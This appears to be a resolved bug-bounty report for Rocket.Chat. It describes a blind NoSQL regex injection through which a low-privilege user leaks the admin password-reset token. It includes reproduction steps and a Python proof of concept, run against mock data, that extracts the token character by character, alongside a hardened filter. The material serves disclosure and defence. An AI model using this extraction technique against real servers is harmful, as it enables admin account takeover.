
Regex account takeover

Critical
Rocket.Chat

Team Summary

Official summary from Rocket.Chat

**Summary:** Get the admin reset token with an authenticated user.

**Description:** A normal user login can access the admin reset token and set a new password for the admin user.

## Releases Affected:

* 3.18.5
* 3.0.5

## Steps To Reproduce (from initial installation to vulnerability):

(Add details for how we can reproduce the issue)

1. Login with a low-privilege user.
2. Copy rc_uid and rc_token for the script.
3. Request a password reset for the admin email; you can find the admin mail with the script.
4. Run the python script to get the reset token with "blind NoSQL injection" (regex search).

## Supporting Material/References:

## Suggested mitigation

* [list any suggested patches or steps to mitigate the problem]

## Impact

The attacker could gain admin access and escalate their own user.

## Fix

3.18.6, 4.4.4 and 4.7.3
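The "regex search" in step 4 is a blind NoSQL injection oracle: a user-controlled filter reaches a MongoDB-style query, and the server only answers whether something matched, so an attacker asks "does the token start with `^a`?", then `^b`, and so on, one character at a time. The block below is an added example, not the reporter's script and not Rocket.Chat code. The user documents, the `services.password.reset.token` field path, the `vulnerable_endpoint`/`hardened_endpoint` functions and the tiny `$regex` matcher are all constructed stand-ins so the block runs offline; nothing about Rocket.Chat's real endpoints or schema is assumed.

```python
"""Blind NoSQL ($regex) extraction of a reset token, and the hardened filter.

Everything here is constructed for illustration: the user documents, the
field path, and the 'endpoint' functions are hypothetical, not Rocket.Chat's.
"""
import re
import string

# Constructed sample data shaped like MongoDB documents (hypothetical).
USERS = [
    {"username": "admin",
     "emails": [{"address": "admin@example.test"}],
     "services": {"password": {"reset": {"token": "sA1b9xQ2"}}}},
    {"username": "alice",
     "emails": [{"address": "alice@example.test"}],
     "services": {}},
]


def _get(doc, dotted):
    """Resolve a dotted field path like 'services.password.reset.token'."""
    cur = doc
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def mongo_like_find(docs, query):
    """Tiny subset of MongoDB matching: equality and {'$regex': pattern}."""
    out = []
    for d in docs:
        ok = True
        for field, cond in query.items():
            val = _get(d, field)
            if isinstance(cond, dict) and "$regex" in cond:
                if not isinstance(val, str) or not re.search(cond["$regex"], val):
                    ok = False
            elif val != cond:
                ok = False
        if ok:
            out.append(d)
    return out


def vulnerable_endpoint(user_filter):
    """Hypothetical API: the client-supplied filter goes straight into the query
    and the response only says whether a user matched. That yes/no is the oracle."""
    return len(mongo_like_find(USERS, user_filter)) > 0


def hardened_endpoint(user_filter):
    """Same API, but operator objects are rejected: every value must be a plain
    string and no key may start with '$', so '$regex' never reaches the query."""
    for field, cond in user_filter.items():
        if field.startswith("$") or not isinstance(cond, str):
            raise ValueError("operator or non-string value in user filter")
    return len(mongo_like_find(USERS, user_filter)) > 0


ALPHABET = string.ascii_letters + string.digits


def leak_token(oracle, username, field="services.password.reset.token", max_len=64):
    """Recover a secret field one character at a time with anchored prefix regexes.

    Each probe asks the oracle: does <username>'s <field> start with known+ch?
    When no character extends the prefix, the whole value has been recovered.
    """
    known = ""
    for _ in range(max_len):
        for ch in ALPHABET:
            probe = {"username": username,
                     field: {"$regex": "^" + re.escape(known + ch)}}
            if oracle(probe):
                known += ch
                break
        else:
            break  # nothing extends the prefix: the token is complete
    return known


if __name__ == "__main__":
    print("leaked:", leak_token(vulnerable_endpoint, "admin"))
    try:
        leak_token(hardened_endpoint, "admin")
    except ValueError as e:
        print("hardened endpoint refused the probe:", e)
```

The extraction needs at most `len(ALPHABET)` requests per character, which is why a blind oracle on a secret field is a critical finding even when no data is returned directly. The fix is not to escape the regex but to refuse operator objects in client-controlled filters (or to allow only whitelisted fields with string values), as `hardened_endpoint` does.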

Reported by ghaem51

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Weakness

SQL Injection